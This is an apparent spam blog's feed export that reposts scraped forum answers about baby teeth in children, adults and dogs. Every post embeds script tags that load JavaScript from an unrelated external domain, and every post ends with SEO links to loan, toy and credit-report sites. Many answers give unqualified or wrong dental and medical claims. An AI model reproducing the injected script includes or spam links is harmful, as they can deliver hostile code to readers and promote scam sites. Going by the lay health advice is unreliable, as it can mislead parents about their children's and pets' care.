tag:blogger.com,1999:blog-20587279808712600112024-03-08T09:50:31.404-08:00baby teeth losingBLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.comBlogger283125tag:blogger.com,1999:blog-2058727980871260011.post-55880553136987308982009-08-02T21:31:00.000-07:002009-08-02T21:31:14.740-07:00I still have baby teeth for my canine teeth. i want t do something about it. should i get veneers?or would you suggest other methods or something. how much would you think veneers would cost?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>I still have baby teeth for my canine teeth. i want t do something about it. should i get veneers?<br>I have a veneer on one of my baby teeth in the front of my mouth. I am over 40 and still have 3 baby teeth with no permanent teeth underneath. You want to hang on to the real tooth as long as you can so go with a veneer. My veneer was around $120, but it really depends on a lot of factors. A veneer on an existing tooth is a lot cheaper than a cap or replacement fake tooth.<br>Reply:not exactly sure but my brother had the same problem and hes 35 had to have a lot of surgery i dont know if age makes a difference.my brother didn't have to pay for the extensive treatment he had but it was very expensive.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.companyforyou.cn/Toys/>Toys</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-89548519453433069342009-08-02T21:30:00.003-07:002009-08-02T21:30:58.225-07:00Does having your baby teeth pulled affect your adult teeth?my daught€r r€c€ntly had t€€th pull€d and i was wond€ring if it aff€ct€d th€ straightn€ss of h€r t€€th<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Does having your baby teeth pulled affect your adult teeth?<br>wow..weird writing. anyway, no it doesn't affect her adult teeth. never affected mine<br>Reply:yeah maybe it does<br>Reply:I doubt it. I only had one tooth pulled when I was younger though. Now I have all my adult teeth and they're straight and I've never had braces.<br>Reply:Yes, it does. It gives the permanent teeth more room so they can grow in straighter. There's no guarantee that she won't need braces in the future but I had to have teeth pulled for the same reason.<br>Reply:If you were advised to have them pulled i can not see there being a problem. If they were just pulled for no reason it might affect the spacing when it comes to future teeth. But that again is not a big problem as that can be fixed with retainers and such.<br>Reply:you don't say why she had them pulled or how old she is. if she's old enough and ready for permanent teeth, it won't hurt them at all. the baby teeth have to leave to make room for the adult teeth.<br>Reply:supposedly, it won't affect adult teeth at all.<br>Reply:Absolutely, there is a reason the baby teeth erupt in a certain order and a reason they fall out in a certain order. If a baby tooth is pulled to early then the baby teeth with shift to fill in that missing space. You can put a spacer in there to hold that space unitl the permanent tooth comes in. But the shifting will cause more problems. For example, no one wants to fix baby teeth because they fall out but if you do not replace a missing baby tooth with a spacer the permanent teeth can not erupt properly if they are shifting and this will result in 5000 braces and even jaw problems or wearing of the teeth.<br>Reply:shouldn't but if the teeth are close together they'll grow in crooked<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.ineedaloan.com.cn/annual-credit-report/>credit report</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-19687895750933172162009-08-02T21:30:00.002-07:002009-08-02T21:30:42.282-07:00Do dogs have baby teeth like humans and then when they fall out they grow an adult pair of teeth?Yes, puppies have 28 deciduous (temporary) teeth and 42 permanent teeth. Puppies have no teeth at birth, and grow deciduous teeth beginning their second week of life. At three months of age, the deciduous teeth begin to be replaced by the permanent teeth. <br><br /><br /><br><br /><br />The replacement process begins with the incisors, and moves backwards through the canines, premolars and finally the molars. The turnover process is usually complete by the time the dog is eight months old, with none of the original 28 deciduous teeth remaining. Most deciduous teeth are swallowed with food and never seen by the pet owner. Occasionally, a deciduous tooth is merely pushed to the side and retained next to the permanent tooth. Retained deciduous teeth can be removed by a veterinarian. <br><br /><br /><br><br /><br />The incisors turn over from deciduous to permanent from two to four months of age. The canines usually convert around six months of age. The premolars and molars follow in that order, with the last permanent molar erupting around eight months of age. <br><br /><br /><br><br /><br />The exact schedule does vary from breed to breed.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Do dogs have baby teeth like humans and then when they fall out they grow an adult pair of teeth?<br>You're very welcome and thank you for picking my answer.<br><br /><br /><br><br /><br />If you're lucky, you might be able to fine one or two to put in a puppy scrapbook like I did :-) <span>Report It</span><br /> <br>Reply:Yes<br>Reply:yes<br>Reply:yes dogs do have baby teeth. When you see one fall out, don't worry. He/she might have a bit of pain but it will go away.<br>Reply:my dog lost her first tooth at 3 months yes and yes <br><br /><br /><br><br /><br /><br><br /><br />Hope i answered your ? :D<br>Reply:Yes dogs have baby teeth and they fall out anywhere from 3 to 6 months of age, being replaced by adult teeth, I have two dogs that kept baby teeth and the adult teeth fused to them so the baby teeth had to be pulled.<br>Reply:Yeah duh! They have sharp puppy teeth and then once those fall out, their adult teeth come in. Do you really think adult teeth would really fit in a small puppy's mouth!<br>Reply:yep,they sure do.and they need dental care too.ask your vet about that,as you can brush their teeth with special doggy paste.can also buy mouth rinse to add to water.<br>Reply:yes<br>Reply:yep! Then they get Grown up teeth like we do.<br>Reply:affirmative!<br>Reply:Yes. It is a real good idea to keep an eye when the adult teeth start cutting to make sure the baby teeth are falling out. Just like kids, the baby tooth may not come out and create a problem.<br>Reply:yes, I have a Bulldog named Muggs and when his baby teeth fell out they were so little, he was around 8 weeks old, he was young when he started losing them, I would find them on the floor.<br><br /><br />Hope this helps!<br><br /><br />Oh and yes, Adult teeth then replace the baby teeth....*smile*<br><br /><br />is your puppy losing teeth?<br>Reply:Yes puppies have 28 baby teeth and adults have 42.<br>Reply:yes they do.<br>Reply:Yes they do have baby teeth and they do get in adult teeth.<br><br /><br />Some breeds do retain baby teeth and need them extracted though.<br>Reply:yes but sometimes they lose them in the yard so you may not notice all of them coming out, however if you look in your dogs mouth you probably cant really tell because in the wild they need to eat os they grow back very fast.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.companyforyou.cn/Luggage/>Luggage</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-57884871554370557422009-08-02T21:30:00.001-07:002009-08-02T21:30:27.522-07:00Do pangolins have "baby teeth" that they loose and get adult teeth?Tricky! I don't think Pangolins have baby teeth or any teeth for that matter since they are anteaters.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Do pangolins have "baby teeth" that they loose and get adult teeth?<br>Pangolins are mammals with very ODD hair that look like plates, but mammal nonetheless, so as mammals, they would seem to have two sets of teeth like other mammals: the baby-deciduous teeth and the adult permanent teeth, but they actually lack teeth! <br><br /><br /><br><br /><br />See info below<br><br /><br /><br><br /><br />The pangolin (also called the scaly anteater) is an unusual mammal that is covered with tough, protective scales made of keratin (the same substance that hair, fingernails, and horn are made from). There are 7 species of pangolins that live in grasslands and forests in parts of Africa and Southeast Asia (Genus Manis). The pangolin lives up to 14 years in captivity. <br><br /><br />Anatomy: The pangolin has scales that cover everything except the belly, snout, eyes, ears, and undersides of the limbs. The pangolin has short legs with huge claws; it uses its claws to dig into ant hills and termite mounds. The sticky tongue is up to 27 inches (70 cm) long. The pangolin ranges from 24-62 inches (60-160 cm) long. The pangolin has no teeth. The long tail is prehensile (grasping); the pangolin can even hang from its tail. <br><br /><br /><br><br /><br />Diet: This insectivore (insect-eater) uses its long, sticky tongue to catch ants, termites, and other insects. It hunts mostly at night; it is a nocturnal animal. <br><br /><br /><br><br /><br />Predators: When in danger, the pangolin curls into a ball, protecting its soft belly and face. It may also hit an enemy with its tail or spray it with urine. Its enemies include lions, tigers, and humans.<br>Reply:As near as I can tell from the scientific literature, Pangolin have no teeth at any stage of their development.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://4skin-cancer.blogspot.com/>skin cancer</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-6360886660042583792009-08-02T21:30:00.000-07:002009-08-02T21:30:11.239-07:00Baby teeth that do not fall out naturally?I'm 26 and have 2 baby teeth that haven't fallen out. One of the teeth does not have a permanent tooth in place for it, so if it's pulled, there's no permanent tooth there to grow in (congenitally missing tooth). My other problem is that my permanent canine grew in through my gums over my baby canine that has never fallen out. I will have the baby tooth pulled, and braces to correct the problem in a few years, when I can hopefully afford it.<br><br /><br /><br><br /><br />From what I've read, baby teeth not falling out isn't really an extremely common problem, but it does happen. Some people's baby teeth last them into old age, if they take very good care of them, but that's not very common. If there's a permanent tooth there, showed by a pan-x, then the baby tooth should probably be pulled to allow the permanent tooth to grow in.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Baby teeth that do not fall out naturally?<br>Need to be pulled in order for adult teeth to grow in. Adult teeth are probably in place up in the gums waiting for their chance.<br>Reply:If the adult tooth is already growing in and the baby tooth is in the way, then the adult tooth may end up in a crooked position. If the baby tooth is wiggly, you could probably remove it yourself. If not, see a dentist. <br><br /><br /><br><br /><br />How old is the child? Some kids may have delayed exfoliation of baby teeth. <br><br /><br /><br><br /><br />Also, it is possible that the baby tooth does not have a permanent tooth growing in behind it, so in some cases you may have to leave the baby tooth there. But, it's best to go to the dentist and have x-rays to find out for sure!<br>Reply:If the tooth hasnt fallen out DO NOT MAKE IT FALL OUT. Baby teeth fall out when the adult teeth PUSH it out as the adult tooth erupts (come up from under the gumline). If the baby tooth doesnt fall out then that could mean there is NO adult tooth underneath. It is seen on an xray where there is an adult tooth underneath the baby tooth or not. Consult a dentist.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://2009viruses.blogspot.com/>viruses</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-31312653388542462402009-08-02T21:29:00.003-07:002009-08-02T21:29:55.454-07:00Baby teeth bust lip open???Our son who is 11 months fell over at the park and bust the top of his lip open blood flow has stopped but it is swollen and looks sore altho he isnt complaining. Is there anything extra we can do for him, I have a doctors appointment tomorrow as its night time here now. It was soo scary.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Baby teeth bust lip open???<br>This is very common. Baby teeth are very sharp! And any facial wound bleeds a lot. The swelling is also normal. Putting cold cloths on it wit help. But trust me. If he is not complaining it is ok. Babies are not shy with not feeling well.<br>Reply:He will be fine where the bleeding has stopped. My boys have all done this before. IB profin will help with the swelling and ice if he will let you. I'm sure the Dr. will tell you the same thing. Your a good mommy, we tend to let it scare us more than it does them.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.companyforyou.cn/>company</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-4804660876603294392009-08-02T21:29:00.002-07:002009-08-02T21:29:38.950-07:00Baby teeth are comeing looks like there comeing from the front of gums?is thos normal or not theres like a lil poke comeing from in from of her gums shes 12 weeks and i know shes young but doctor said its possable ..whats wrong here<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Baby teeth are comeing looks like there comeing from the front of gums?<br>my kids got teeth really early as well that sounds pretty normal to me but sometimes babies get teeth coming through and then they go back up and then keep doing that for a while. but i know both of my kids did that for a while before cutting a tooth good luck and congrats on baby by the way<br>Reply:my daughters came in at 41/2 months.<br><br /><br /> <br><br /><br />There have been very rare cases of the baby being born with some teeth.<br>Reply:They always look like they're coming through the front at first..and then they end up looking right. Every tooth my daughter gets I'm like 'oh my god, it's coming the front' and they've all come in straight.<br><br /><br />12 weeks isn't too early..some kids just get them at different times..my daughter is 22 months and even has her 2 year molars and her eye teeth just started coming in this month.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.ineedaloan.com.cn/auto-financing/>auto financing</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-9098626714384749632009-08-02T21:29:00.001-07:002009-08-02T21:29:24.917-07:00Why are baby teeth whiter than adult teeth?Dentin makes up the main portion of the tooth structure. In primary teeth, it's very light yellow - almost white so that it doesn't show as much through the translucent white enamel. In permanent teeth, it is a light yellow and commonly darkens with age. It also takes up more tooth structure in an adult tooth than a baby tooth. The enamel remains translucent - you just see the dentin underneath. The darker the dentin, the more yellow your teeth are.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Why are baby teeth whiter than adult teeth?<br>Well, for one thing, they are newer. They haven't been exposed to all the things that stain adult teeth.<br>Reply:No coffee, no tea, no chocolate, no blueberries, no red wine...<br>Reply:the teeth are kind of like crystals. It takes time for chemicles to get into them and change teh colors. Plus not to many babies are out drinking huge amounts of coffee, sodas, or smoking cigarettes.<br>Reply:cuz they are brand spankin new<br>Reply:Depends what food you eat - if you smoke..<br><br /><br /><br><br /><br />If you ate as healthily as a baby, then they would be just like baby teeth.<br>Reply:I'm a dentist.<br><br /><br /><br><br /><br />Less dentin underneath the enamel. Enamel is actually translucent white. It's the dentin beneath that makes your teeth have a yellow hue.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://car-audio4.blogspot.com/>car audio</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-56957374048992955152009-08-02T21:29:00.000-07:002009-08-02T21:29:07.591-07:00Are canine teeth baby teeth?We have two sets of canine (or eye) teeth, one primary (or baby) and one permanent (or adult). Of course if you are talking canine as in dog teeth they too have primary and permanent teeth!<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Are canine teeth baby teeth?<br>they are before you loose them. When a kid is about 10-12 they loose them and they grow in adult teeth.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://flower.imwebhost.com/flower/>flower</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-83805351228043039002009-08-02T21:28:00.002-07:002009-08-02T21:28:55.852-07:00Chihuahua has his adult teeth, one baby tooth failed to fall out. Is this a health issue?He is 7 months old and is healthy but I wondered whether I need to have this tooth pulled or if its okay to stay where it is.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Chihuahua has his adult teeth, one baby tooth failed to fall out. Is this a health issue?<br>Give it some more time. If it doesn't fall out ask your vet about it. Sometimes they do need to remove the teeth if it's causing or has the potential to cause problems. It can be done when your little guy is neutered if it doesn't fall out on it's own by then. My youngest cat had to have one of her baby teeth pulled when she got spayed. It's a pretty common thing. Good luck!<br>Reply:Give it more time. It may take another month or so for it to fall out. My puppy had all of his adult teeth in, except one. His last baby tooth fell about about 3 weeks later. Sometimes an adult tooth will come in before the baby tooth falls out. It looks kind of weird, a big tooth with a little baby tooth beside it; but it's nothing to worry about. It'll fall out eventually.<br>Reply:i'm going to assume its a fang tooth..... give it a few weeks feed her the normal hard food it might fall out on its own... if not your vet will need to pull it.<br>Reply:no i do not think has anything to do with his health but what you should do is take it to the vet and ask them what is wrong.<br>Reply:It is about time for you puppy to get a booster vaccine and a mid year check up. Have the vet take a look and see what he says.<br>Reply:no it's not we have a chiuaua and it still has some of his babby teeth and he is full grone<br>Reply:my min pin had the same thing happen, his two fangs (top) were in , %26amp; the baby fangs were right behind the adult ones, he looked very funny, but i looked one day %26amp; they were gone, had no problems.<br>Reply:he has just recently got his adult teeth. If it is a eye tooth or a vang, as the adaut tooth comes in it will push it out. Buy him a soup boan at the supermarket to give him something to chew on. If the tooth doesn't come out by the time the pup is one year old, have the vet check it out.<br>Reply:no because there is no specific time that says he has to get them.<br>Reply:most likely its a moler the main food crunching tooth. these take a month or two longer to fall out than the others.(dont give ur dogs hot food makes their teeth fall out)<br>Reply:It has been my experience that when you spay or neuter your dog at 6 months old, if the adult canine teeth are in and the baby canines remain, they should be extracted. I would certainly discuss this with your vet.<br>Reply:I also have a chihuahua %26amp; one of her baby teeth did not fall out. When I took her to be spayed they pulled her tooth. That way they only had to put her to sleep once. The vet told me if it wasn't pulled it could cause problems in the long run. Good Luck and take your little man to the vet.<br>Reply:PULL IT!!!<br><br /><br /><br><br /><br /> It'll ROT **%26amp;** cause problems w/the spacing of the adult teeth!!!<br><br /><br />*NOT* ok to leave it!<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://24safety.blogspot.com/>safety</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-12627885296859114382009-08-02T21:28:00.001-07:002009-08-02T21:28:36.202-07:00How many baby teeth do we have and how many adult teeth do we have?18-20 Baby teeth and 32-34 adult teeth<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>How many baby teeth do we have and how many adult teeth do we have?<br>20 baby teeth and 32 adult<br>Reply:and teeth come under the topic of 'physcis' how?<br>Reply:you have 20 baby teeth (10 on the top %26amp; bottom)<br><br /><br />when you grow up you have a total of 32<br><br /><br />you get a set of molers at 6 years, then another set at 12 years.<br><br /><br />finally you get a set (of molers) sometime after that. those we call wisdom teeth<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://11business-finance.blogspot.com/>business finance</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-39798294124067737472009-08-02T21:28:00.000-07:002009-08-02T21:28:11.845-07:00Can a 28 year old still have baby teeth and when one is lost can another 1 grow in there?I had a tooth pulled last friday and it happened to be one that I had about a year or so ago had a root canal done on it well any ways this might be a dumb question but can i have a tooth above it couse there is somthing white in the whole where the tooth was it was one of my eye tooths<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Can a 28 year old still have baby teeth and when one is lost can another 1 grow in there?<br>Without being a dentist, I can tell you its possible to have baby teeth at 28, but no an adult teeth wont grow, you would need a new tooth screwed in at the dentist (I've forgotten the name of it)<br>Reply:yes as a 28 year you can have baby teeth but not common and no you will not have new ones come out. most likely those are the only teeth you get the best thing to do is see a dentist and the dentist will take an x-ray on you thats called a PANO there you will see what you have in your mouth after you baby teeth fall out and if they do you will need a dencher or implants<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://3car-makes.blogspot.com/>car makes</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-17232759553345647782009-08-02T21:27:00.003-07:002009-08-02T21:27:49.580-07:00Do only humans lose baby teeth and grow adult ones? Dogs, Monkeys, etc...do they lose baby teeth?All mammals have two sets of teeth. The milk teeth and their adult teeth, it's one of the defining characteristics of our genera. Outside of hair, milk and our ear bones.<br><br /><br /><br><br /><br />It's the price of having specialized teeth, all other vertibrates with teeth have an unlimited capacity to regrow their teeth. Their teeth are just variations on a cone shape though. No specialized crinders and cutters or chisels.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Do only humans lose baby teeth and grow adult ones? Dogs, Monkeys, etc...do they lose baby teeth?<br>YES - only sharks don't<br>Reply:Most animals loose baby teeth. Dogs and cats usualy swallow them.<br>Reply:They almost all do, some have and infinite set of teeth always available to cover the lost ones<br>Reply:Dogs definitely do. and monkeys presumably so. Anything with teeth when little has to get adult teeth later, because teeth do not grow.<br>Reply:I know for sure dogs do, I have found several from my puppies.<br><br /><br />I gather the same goes for cats and other animals.<br>Reply:Almost all animals with teeth have both baby and adult teeth.<br>Reply:I dunno about Monkeys, but puppies do. They usually swallow them, but I am sure if you look really hard you may find one in their food or something.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.companyforyou.cn/>company</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-52163532524813829512009-08-02T21:27:00.002-07:002009-08-02T21:27:35.264-07:00Is it normal for a12 months old baby to not have ant teeth.?my niece friend has a 12 months old baby how comes he does have any teeth some babies start getting teeth earlier than others.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Is it normal for a12 months old baby to not have ant teeth.?<br>Some children do get their teeth earlier then 12 months but some much later then that 24 months. You and your niece and niece friend have no thing to worry about. It may be a good thing ( bottle nipple are not getting bit and hole in them)<br>Reply:Yes it is possible. sometimes people start early and others later. If she is bringing her child to the DR for well visits and the Dr is not worried then I wouldn't worry. The longer the better since the teeth are not exposed to cavity causing germs.<br>Reply:He will get teeth eventually.<br>Reply:all babies develope at a different speed no one baby is alike<br><br /><br />has the child been taken to the dentist yet<br>Reply:It's all genetics. Me and my siblings didn't have teeth until after 12 months. We were also the last ones to lose our baby teeth. There's a huge range in whats normal.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.necklace.org.cn/>necklace</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-72616911134190031972009-08-02T21:27:00.001-07:002009-08-02T21:27:16.100-07:00Why do boy babies get their baby teeth first but girl babies get permanent teeth first?It's for school work. It's not for meepit. It's for her Mom.<br><br /><br />Thanks.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Why do boy babies get their baby teeth first but girl babies get permanent teeth first?<br>That's not true. No matter what the sex, babies get baby teeth.<br>Reply:.... they dont. every single baby gets baby teeth first, loses them and then the permanent ones grow in.<br>Reply:That completely and utterly false. All babies get baby teeth first, even if they're born with teeth.<br><br /><br /><br><br /><br />All of my teeth fell out and I grew in adult teeth. The tooth fairy gave me money :-p<br>Reply:Hi Meepit!<br><br /><br /><br><br /><br />All babies have milk teeth first.<br><br /><br /><br><br /><br />Then adult teeth.<br><br /><br /><br><br /><br />no exceptions.<br><br /><br /><br><br /><br />=0)<br><br /><br /><br><br /><br />Meepit!!!<br>Reply:Don't know where you got that info from but boy/girl cut there baby teeth in first then as they grow older into a kid that's when there baby teeth fall out to get there permanent teeth<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://7accessories.blogspot.com/>accessories</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-26358456739605728422009-08-02T21:27:00.000-07:002009-08-02T21:27:03.516-07:00Do puppys lose they're baby teeth? Do they even have baby teeth?I noticed blood on my new puppy's toy while playing with her. I looked at it and it looks like she may have lost a tooth. Is this normal?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Do puppys lose they're baby teeth? Do they even have baby teeth?<br>yes they do have baby teeth, and yes they lose them. they usually swallow them but sometimes you find them laying around<br>Reply:Yes, it's totally normal.. Like humans, puppies have baby teeth and they will loose them when their permanent teeth start growing in.<br>Reply:It is normal.<br>Reply:Yes it is. Just like us, dogs have baby teeth and will lose them. Nothing to worry about at all. :)<br>Reply:yeah they are like little babys they will lose there baby teeth<br>Reply:yes they change their teeth<br>Reply:yes they do....when my puppy first started losing his i freaked out...i thought he had broken it or something..but when i called the vet and asked about it he said it was perfectly natural<br>Reply:yup they do! Most of the time you wont find them or even realize they fell out. Make sure to give your new puppy lots of chew toys to help with his teething!<br>Reply:Yes, pups lose their puppy teeth. This generally goes from 4-6 months old. This is the teething phase, where they want to chew on everything. Usually you don't even see the teeth because they swallow them when they fall out, but when playing with toys they will sometimes come out and fall on the ground. It's normal, and there is no need to worry!<br>Reply:canines most definitly are born with a set of teeth which later on are replaced with adulthood ones. like humans they are overgrown by the older pairs and eventually fall off.<br>Reply:Puppies do lose their baby teeth.<br>Reply:Yes they alll lose there baby teeth! It is natural! Don't play tug a war when she has loose teethe! Any more questions please Email me at Pugglewlover1207@GMAil.com<br>Reply:Yes they do, but why didn't you do some research and learn about dogs before owning one?<br>Reply:yes this is normal, i have pitbull and no to long ago he was loosing his teeth left and right i even found one on the floor, but then i looked in his mouth and seen some bigger teeth coming right in. don't worry, and when you see bleeding take it's toy away for a few minutes, just till the bleeding stops then give it back because it's teething. good luck!<br>Reply:Yeah, it's perfectly normal. When puppies start chewing on things (you'll be surprised how creative they can get, 2 of my dogs chewed into the sheet rock of the walls), they're teething (the pain of new teeth coming in if I remember right). Start buying toys for them to chew on to break bad habits early on. You'll just have to try to see what's best, soft plastic toys (like balls) are probably best.<br>Reply:Puppies do have baby teeth. They have 28 baby teeth between three and six weeks of age. They lost those teeth when they are around four months old. There is some variation in breed but most have 42 adult teeth, with the molars coming in last at about six - seven months old.<br>Reply:Yes they do ,Usually they just swallow them<br>Reply:Yes, they have baby teeth. The adult teeth begin coming in at about 4 months with the incisors, and continue up to about 7 or 8 months for the last molars. It's the reason most chewing problems begin to occur in this time period. Make sue she has plenty of "legal" toys to chew on or she will find things to gnaw on that you might not appreciate having chewed!<br>Reply:Yes they have puppy teeth and will start to lose them around 4 months of age. Keep an eye on them because sometimes they will not lose one or two puppy teeth and the adult teeth will have a hard time coming in. If that happens they may need to have the tooth extracted by the vet. It is safe to use some baby teething gel on their gums while they are teething if they seem to be in a lot of pain..use a small amount and rub it on the gums. Providing some hard rubber bones with bumps on them with help with the teething stage also by encouraging those puppy teeth to loosen up and come out.<br>Reply:yes..i had never thought about it until my dog lost his and i've actually found some...<br>Reply:As you can tell by all the replies they do have baby teeth. Then why am I typing my fat fingers to the bone? Nobody warned you about the teeth falling on the floor and you stepping on them. Lets just say my kids learned a couple of new words the first time I stepped on one. Good luck!<br>Reply:Absolutely normal. They usually fall out while they are eating, and you never even see the missing teeth. You have nothing to worry about--Your Puppy is growing up---CONGRATULATIONS..<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://21performing-arts.blogspot.com/>performing arts</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-45543048876153637812009-08-02T21:26:00.002-07:002009-08-02T21:26:49.558-07:00When do babies teeth? my baby is over 7 months and she has no teeth..?it depends..some teeth at 3 months which seems to early and some teeth at 8 months which seems late... you never know she could get more teeth at once ... they say that is better because you dont have to go through the teething cycle as many times...also i have heard salty product harder the gums and it makes it harder for teeth to come in<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>When do babies teeth? my baby is over 7 months and she has no teeth..?<br>Every baby develops in their own time. My kids didn't get teeth till like 9 months. Just be patient.<br>Reply:they should be getting teeth between 6 and 12 months so she still has alot of time<br>Reply:relax, are you waiting for the all night crying !<br><br /><br /><br><br /><br />it will come and you;ll be wishing it hadn;t.<br>Reply:Don't worry, your baby's teeth will come through in their own time. My daughter just had one tooth at the top front for ages but now she has all she needs!<br><br /><br /><br><br /><br />Ask your health visitor if you are really concerned - they are the experts.<br>Reply:My friend has a baby his first tooth started coming in at about 9 maybe 10 months he's now 11 1/2 months he has alot of teeth so they come in fast once you see the first one.Same as when he learns to crawl once he gets started he crawls everywhere he'll be walking soon.<br>Reply:my first baby had her teeth when she was 5.5 months but my second baby, she is now 6 months havent got teeths, so its normal and depends on child to child, so nothing to worry about<br>Reply:my baby is 11 month,she got a teeth at 9 month only.u wait for few months.<br>Reply:do,nt worry<br>Reply:generally after 1 year<br>Reply:it differs for all kids mine is 14 monthes and has only 6...<br>Reply:I have two kids and they both started teething around 3 months. They both had 2 bottom teeth by 5 months. Teething can take up to three months before a tooth is visible. <br><br /><br /><br><br /><br />The symptoms are of course saliva everywhere, and constantly dribbling. Turn off milk %26amp; food if they are older. Crying at night and during the day cause of the pain. <br><br /><br /><br><br /><br />I have friends whose kids were around 15 months when they had their frist tooth. Don't stress it's not an issue. So many mothers put pressure on themselves if their children don't do things by a certain time. Mothers are also competitive. In our street mothers toilet trained their kids from 6 months so their child would be first etc.. same with walking and talking. <br><br /><br /><br><br /><br />If your child is happy and healthy they will develop when they are ready. Just be patient.<br>Reply:first be patiant they start any where from 4 months to a year<br>Reply:Some babies are born with teeth, and some don't get them until they are over a year! Average age is 6-8 months but it varies quite a bit.<br><br /><br /><br><br /><br />If your baby is otherwise healthy she will get teeth. There are some EXTREMELY RARE conditions which can result in never getting teeth, but they are associated with other birth defects which would be present already.<br><br /><br /><br><br /><br />If a baby doesn't have teeth by 18 months we will sometimes refer them for X-rays just to make sure that teeth exist, but nothing you have to worry about now.<br>Reply:It varies. Both of my children were over a year before their teeth came in. They have strong teeth and never a cavity and are both teenagers now. They do have the tendency to lose them later also.<br>Reply:It differs for each child. I asked my daughter's pediatrition about why some kinds walk before others and talk before others, etc. He said the way he likes to describe this phenomenon to the parents is this:<br><br /><br /><br><br /><br />Babies bodies seem to concentrate really hard on one thing at a time. That means that one child may talk at 6 months, but not walk until after a year old. Their bodies want to master one task before they move to another.<br><br /><br /><br><br /><br />My daughter did not have any teeth until one years old, but she was already walking and talking just fine. Don't ever try to compare your kids to someone else's kids because you will just make yourself worried. <br><br /><br /><br><br /><br />I've seen babies with teeth at 4 months, so it really does differ from child to child.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><br><a 